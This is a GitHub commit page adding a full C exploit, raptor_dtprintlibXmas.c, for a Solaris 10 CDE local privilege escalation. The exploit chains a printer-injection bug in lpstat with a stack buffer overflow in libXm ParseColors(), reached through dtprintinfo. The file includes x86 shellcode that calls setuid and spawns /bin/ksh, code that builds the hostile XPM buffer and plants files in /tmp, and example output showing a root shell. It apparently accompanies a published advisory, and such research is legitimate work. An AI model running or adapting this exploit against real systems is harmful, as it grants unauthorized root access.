STRLCPY/0xdea-exploits

Add raptor_dtprintlibXmas.c
raptor committed with GitHub 1 year ago

9924375b

1 parent 14c4e77e

Total 1 files

■ ■ ■ ■ ■ ■

solaris/raptor_dtprintlibXmas.c

1	+	/*
2	+	* raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
3	+	* Copyright (c) 2023 Marco Ivaldi <[email protected]>
4	+	*
5	+	* "What has been will be again,
6	+	* what has been done will be done again;
7	+	* there is nothing new under the Sun."
8	+	* -- Ecclesiastes 1:9
9	+	*
10	+	* #Solaris #CDE #0day #ForeverDay #WontFix
11	+	*
12	+	* This exploit illustrates yet another way to abuse the infamous dtprintinfo
13	+	* binary distributed with the Common Desktop Environment (CDE), a veritable
14	+	* treasure trove for bug hunters since the 1990s. It's not the most reliable
15	+	* exploit I've ever written, but I'm quite proud of the new vulnerabilities
16	+	* I've unearthed in dtprintinfo with the latest Solaris patches (CPU January
17	+	* 2021) applied. The exploit chain is structured as follows:
18	+	* 1. Inject a fake printer via the printer injection bug I found in lpstat.
19	+	* 2. Exploit the stack-based buffer overflow I found in libXm ParseColors().
20	+	* 3. Enjoy root privileges!
21	+	*
22	+	* For additional details on my bug hunting journey and on the vulnerabilities
23	+	* themselves, you can refer to the official advisory:
24	+	* https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt
25	+	*
26	+	* Usage:
27	+	* $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall
28	+	* $ ./raptor_dtprintlibXmas 10.0.0.109:0
29	+	* raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
30	+	* Copyright (c) 2023 Marco Ivaldi <[email protected]>
31	+	*
32	+	* Using SI_PLATFORM : i86pc (5.10)
33	+	* Using stack base : 0x8047fff
34	+	* Using safe address : 0x8045790
35	+	* Using rwx_mem address : 0xfeffa004
36	+	* Using sc address : 0x8047fb4
37	+	* Using sprintf() address : 0xfefd1250
38	+	* Path of target binary : /usr/dt/bin/dtprintinfo
39	+	*
40	+	* On your X11 server:
41	+	* 1. Select the "fnord" printer, then click on "Selected" > "Properties".
42	+	* 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu.
43	+	*
44	+	* Back to your original shell:
45	+	* # id
46	+	* uid=0(root) gid=1(other)
47	+	*
48	+	* IMPORTANT NOTE.
49	+	* The buffer overflow corrupts some critical variables in memory, which we
50	+	* need to fix. In order to do so, we must patch the hostile buffer at some
51	+	* fixed locations with the first argument of the last call to ParseColors().
52	+	* The easiest way to get such a safe address is via the special 0x41414141
53	+	* command-line argument and truss, as follows:
54	+	* $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT
55	+	* $ grep ParseColors OUT \| tail -1
56	+	* 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724)
57	+	* ^^^^^^^^^ << this is the safe address we need
58	+	*
59	+	* Tested on:
60	+	* SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021)
61	+	* [previous Solaris versions are also likely vulnerable]
62	+	*/
63	+
64	+	#include <fcntl.h>
65	+	#include <link.h>
66	+	#include <procfs.h>
67	+	#include <stdio.h>
68	+	#include <stdlib.h>
69	+	#include <strings.h>
70	+	#include <unistd.h>
71	+	#include <sys/stat.h>
72	+	#include <sys/systeminfo.h>
73	+
74	+	#define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"
75	+	#define INFO2 "Copyright (c) 2023 Marco Ivaldi <[email protected]>"
76	+
77	+	#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
78	+	#define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging
79	+	#define BUFSIZE 1106 // size of hostile buffer
80	+	#define PADDING 1 // hostile buffer padding
81	+	#define SAFE 0x08045770 // 1st arg to ParseColors()
82	+
83	+	char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */
84	+	/* triple setuid() */
85	+	"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
86	+	"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
87	+	"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
88	+	/* execve() */
89	+	"\x31\xc0\x50\x68/ksh\x68/bin"
90	+	"\x89\xe3\x50\x53\x89\xe2\x50"
91	+	"\x52\x53\xb0\x3b\x50\xcd\x91";
92	+
93	+	/* globals */
94	+	char *arg[2] = {"foo", NULL};
95	+	char *env[256];
96	+	int env_pos = 0, env_len = 0;
97	+
98	+	/* prototypes */
99	+	int add_env(char *string);
100	+	void check_bad(int addr, char *name);
101	+	int get_env_addr(char path, char *argv);
102	+	int search_ldso(char *sym);
103	+	int search_rwx_mem(void);
104	+	void set_val(char *buf, int pos, int val);
105	+
106	+	/*
107	+	* main()
108	+	*/
109	+	int main(int argc, char **argv)
110	+	{
111	+	char buf[BUFSIZE], cmd[1024], *vuln = VULN;
112	+	char platform[256], release[256], display[256];
113	+	int i, sc_addr, safe_addr = SAFE;
114	+	FILE *fp;
115	+
116	+	int sb = ((int)argv[0] \| 0xfff); // stack base
117	+	int ret = search_ldso("sprintf"); // sprintf() in ld.so.1
118	+	int rwx_mem = search_rwx_mem(); // rwx memory
119	+
120	+	/* helper that prints argv[0] address, used by get_env_addr() */
121	+	if (!strcmp(argv[0], arg[0])) {
122	+	printf("0x%p\n", argv[0]);
123	+	exit(0);
124	+	}
125	+
126	+	/* print exploit information */
127	+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
128	+
129	+	/* process command line */
130	+	if ((argc < 2) \|\| (argc > 3)) {
131	+	fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n",
132	+	argv[0]);
133	+	exit(1);
134	+	}
135	+	snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);
136	+	if (argc > 2) {
137	+	safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);
138	+	}
139	+
140	+	/* enter debug mode */
141	+	if (safe_addr == 0x41414141) {
142	+	unlink(DEBUG);
143	+	snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);
144	+	if (system(cmd) == -1) {
145	+	perror("error creating debug binary");
146	+	exit(1);
147	+	}
148	+	vuln = DEBUG;
149	+	}
150	+
151	+	/* fill envp while keeping padding */
152	+	add_env("LPDEST=fnord"); // injected printer
153	+	add_env("HOME=/tmp"); // home directory
154	+	add_env("PATH=/usr/bin:/bin"); // path
155	+	sc_addr = add_env(display); // x11 display
156	+	add_env(sc); // shellcode
157	+	add_env(NULL);
158	+
159	+	/* calculate shellcode address */
160	+	sc_addr += get_env_addr(vuln, argv);
161	+
162	+	/* inject a fake printer */
163	+	unlink("/tmp/.printers");
164	+	unlink("/tmp/.printers.new");
165	+	if (!(fp = fopen("/tmp/.printers", "w"))) {
166	+	perror("error injecting a fake printer");
167	+	exit(1);
168	+	}
169	+	fprintf(fp, "fnord :\n");
170	+	fclose(fp);
171	+	link("/tmp/.printers", "/tmp/.printers.new");
172	+
173	+	/* craft the hostile buffer */
174	+	bzero(buf, sizeof(buf));
175	+	for (i = PADDING; i < BUFSIZE - 16; i += 4) {
176	+	set_val(buf, i, ret); // sprintf()
177	+	set_val(buf, i += 4, rwx_mem); // saved eip
178	+	set_val(buf, i += 4, rwx_mem); // 1st arg
179	+	set_val(buf, i += 4, sc_addr); // 2nd arg
180	+	}
181	+	memcpy(buf, "\"c c ", 5); // beginning of hostile buffer
182	+	buf[912] = ' '; // string separator
183	+	set_val(buf, 1037, safe_addr); // safe address
184	+	set_val(buf, 1065, safe_addr); // safe address
185	+	set_val(buf, 1073, 0xffffffff); // -1
186	+
187	+	/* create the hostile XPM icon files */
188	+	system("rm -fr /tmp/.dt");
189	+	mkdir("/tmp/.dt", 0755);
190	+	mkdir("/tmp/.dt/icons", 0755);
191	+	if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {
192	+	perror("error creating XPM icon files");
193	+	exit(1);
194	+	}
195	+	fprintf(fp, "/* XPM /\nstatic char xpm[] = {\n\"8 8 3 1\",\n%s", buf);
196	+	fclose(fp);
197	+	link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");
198	+	link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");
199	+
200	+	/* print some output */
201	+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
202	+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
203	+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
204	+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
205	+	fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);
206	+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
207	+	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
208	+	fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);
209	+	fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);
210	+
211	+	/* check for badchars */
212	+	check_bad(safe_addr, "safe address");
213	+	check_bad(rwx_mem, "rwx_mem address");
214	+	check_bad(sc_addr, "sc address");
215	+	check_bad(ret, "sprintf() address");
216	+
217	+	/* run the vulnerable program */
218	+	execve(vuln, arg, env);
219	+	perror("execve");
220	+	exit(0);
221	+	}
222	+
223	+	/*
224	+	* add_env(): add a variable to envp and pad if needed
225	+	*/
226	+	int add_env(char *string)
227	+	{
228	+	int i;
229	+
230	+	/* null termination */
231	+	if (!string) {
232	+	env[env_pos] = NULL;
233	+	return env_len;
234	+	}
235	+
236	+	/* add the variable to envp */
237	+	env[env_pos] = string;
238	+	env_len += strlen(string) + 1;
239	+	env_pos++;
240	+
241	+	/* pad envp using zeroes */
242	+	if ((strlen(string) + 1) % 4)
243	+	for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
244	+	env[env_pos] = string + strlen(string);
245	+	env_len++;
246	+	}
247	+
248	+	return env_len;
249	+	}
250	+
251	+	/*
252	+	* check_bad(): check an address for the presence of badchars
253	+	*/
254	+	void check_bad(int addr, char *name)
255	+	{
256	+	int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP
257	+
258	+	for (i = 0; i < sizeof(bad) / sizeof(int); i++) {
259	+	if (((addr & 0xff) == bad[i]) \|\|
260	+	((addr & 0xff00) == bad[i]) \|\|
261	+	((addr & 0xff0000) == bad[i]) \|\|
262	+	((addr & 0xff000000) == bad[i])) {
263	+	fprintf(stderr, "error: %s contains a badchar\n", name);
264	+	exit(1);
265	+	}
266	+	}
267	+	}
268	+
269	+	/*
270	+	* get_env_addr(): get environment address using a helper program
271	+	*/
272	+	int get_env_addr(char path, char *argv)
273	+	{
274	+	char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
275	+	char hex[11];
276	+	int fd[2], addr;
277	+
278	+	/* truncate program name at correct length and create a hard link */
279	+	prog[strlen(path)] = '\0';
280	+	unlink(prog);
281	+	link(argv[0], prog);
282	+
283	+	/* open pipe to read program output */
284	+	if (pipe(fd) == -1) {
285	+	perror("pipe");
286	+	exit(1);
287	+	}
288	+
289	+	switch(fork()) {
290	+
291	+	case -1: /* cannot fork */
292	+	perror("fork");
293	+	exit(1);
294	+
295	+	case 0: /* child */
296	+	dup2(fd[1], 1);
297	+	close(fd[0]);
298	+	close(fd[1]);
299	+	execve(prog, arg, env);
300	+	perror("execve");
301	+	exit(1);
302	+
303	+	default: /* parent */
304	+	close(fd[1]);
305	+	read(fd[0], hex, sizeof(hex));
306	+	break;
307	+	}
308	+
309	+	/* check address */
310	+	if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
311	+	fprintf(stderr, "error: cannot read address from helper\n");
312	+	exit(1);
313	+	}
314	+
315	+	return addr + strlen(arg[0]) + 1;
316	+	}
317	+
318	+	/*
319	+	* search_ldso(): search for a symbol inside ld.so.1
320	+	*/
321	+	int search_ldso(char *sym)
322	+	{
323	+	int addr;
324	+	void *handle;
325	+	Link_map *lm;
326	+
327	+	/* open the executable object file */
328	+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
329	+	perror("dlopen");
330	+	exit(1);
331	+	}
332	+
333	+	/* get dynamic load information */
334	+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
335	+	perror("dlinfo");
336	+	exit(1);
337	+	}
338	+
339	+	/* search for the address of the symbol */
340	+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
341	+	fprintf(stderr, "sorry, function %s() not found\n", sym);
342	+	exit(1);
343	+	}
344	+
345	+	/* close the executable object file */
346	+	dlclose(handle);
347	+
348	+	return addr;
349	+	}
350	+
351	+	/*
352	+	* search_rwx_mem(): search for an RWX memory segment valid for all
353	+	* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
354	+	*/
355	+	int search_rwx_mem(void)
356	+	{
357	+	int fd;
358	+	char tmp[16];
359	+	prmap_t map;
360	+	int addr = 0, addr_old;
361	+
362	+	/* open the proc filesystem */
363	+	sprintf(tmp,"/proc/%d/map", (int)getpid());
364	+	if ((fd = open(tmp, O_RDONLY)) < 0) {
365	+	fprintf(stderr, "can't open %s\n", tmp);
366	+	exit(1);
367	+	}
368	+
369	+	/* search for the last RWX memory segment before stack (last - 1) */
370	+	while (read(fd, &map, sizeof(map)))
371	+	if (map.pr_vaddr)
372	+	if (map.pr_mflags & (MA_READ \| MA_WRITE \| MA_EXEC)) {
373	+	addr_old = addr;
374	+	addr = map.pr_vaddr;
375	+	}
376	+	close(fd);
377	+
378	+	/* add 4 to the exact address NUL bytes */
379	+	if (!(addr_old & 0xff))
380	+	addr_old \|= 0x04;
381	+	if (!(addr_old & 0xff00))
382	+	addr_old \|= 0x0400;
383	+
384	+	return addr_old;
385	+	}
386	+
387	+	/*
388	+	* set_val(): copy a dword inside a buffer (little endian)
389	+	*/
390	+	void set_val(char *buf, int pos, int val)
391	+	{
392	+	buf[pos] = (val & 0x000000ff);
393	+	buf[pos + 1] = (val & 0x0000ff00) >> 8;
394	+	buf[pos + 2] = (val & 0x00ff0000) >> 16;
395	+	buf[pos + 3] = (val & 0xff000000) >> 24;
396	+	}
397	+

Add raptor_dtprintlibXmas.c